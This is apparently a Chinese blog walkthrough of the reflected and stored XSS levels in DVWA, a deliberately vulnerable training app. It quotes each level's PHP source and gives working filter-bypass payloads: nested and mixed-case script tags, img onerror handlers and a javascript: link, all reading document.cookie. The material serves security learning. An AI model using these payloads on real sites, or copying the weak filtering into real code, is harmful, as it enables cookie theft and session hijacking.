DVWA之xss学习
自己的小小思路,有错误请指正
写的是dvwa中的xss,反射型与储存型,进行白盒测试
xss(Reflected)
关卡1:low
源码
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Feedback for end user
echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>
这段代码中的’name’直接输出,并未进行过滤处理;所以我们直接使用JavaScript脚本代码去测试一下
payload:
<script>alert(document.cookie)</script>
关卡2:medium
源码
<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = str_replace( '<script>', '', $_GET[ 'name' ] ); str_replace()函数替换字符串中的一些字符(区分大小写)
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
?>
这里使用str_replace()函数对'name'中的<script>替换为空,但这只过滤了一层<script>,且区分大小写。
我们构造一段payload:
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
<scR<script>ipt>alert(document.cookie)</scr</script>Ipt>
<SCript>alert(document.cookie)</SCRIPT>
通过叠加标签<script>、大小写来绕过
关卡3:hight
源码:
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
//preg_replace 函数执行一个正则表达式的搜索和替换。i是表示不区分大小写
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
?>
源码中对’name’中进行了正则表达式,进行搜索和替换,<script被过滤掉了,并不区分大小写,但只过滤了这些符号字母,却没有对事进行过略
这是通过事件来构造 payload:
<img src='!' onerror=alert(document.cookie)>
xss(Stored)
关卡1:low
源码:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] ); trim()函数:移除字符串两侧的空白字符或其他预定义字符
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input(清理信息输入)
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitize name input
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
可以看出对有害输入没有任何过滤,直接将用户提交的内容插入数据库,输入点在两个输入框都有
但name那里的输出框的长度只有十,我们通过f12修改为较大的数字在进行插入我们的测试代码
payload:
<a href='javascript:alert(document.cookie)'>
<script>prompt(document.cookie)</script>
关卡2:medium
源码:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = str_replace( '<script>', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
$message = strip_tags( addslashes( $message ) );
$message = htmlspecialchars( $message );
$name = str_replace( '<script>', '', $name );
对$message和$name中的字符串前后两侧的空白字符移除,对$message进行了返回在预定的字符前添加反斜杠的字符串
还对$message进行预定义的字符装换
这段代码对$message做了一些过略和规则,但对$name只过滤了<script>过滤,我们可以在firebug中对$name的长度修改
然后通过大小写,叠加标签的做法,插入测试代码
payload:
<img scr='#' onerror=confirm(document.cookie)>
关卡3:high
源码:
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
和关卡2:medium一样的过略,但这里吧$name中的标签<script>进行细化过滤,并对大小写过略,
payload:<img scr='#' onerror="confirm(/xss/)">
一起学习一起进步!
参考:
https://www.freebuf.com/articles/web/157953.html
时间:2019.5.7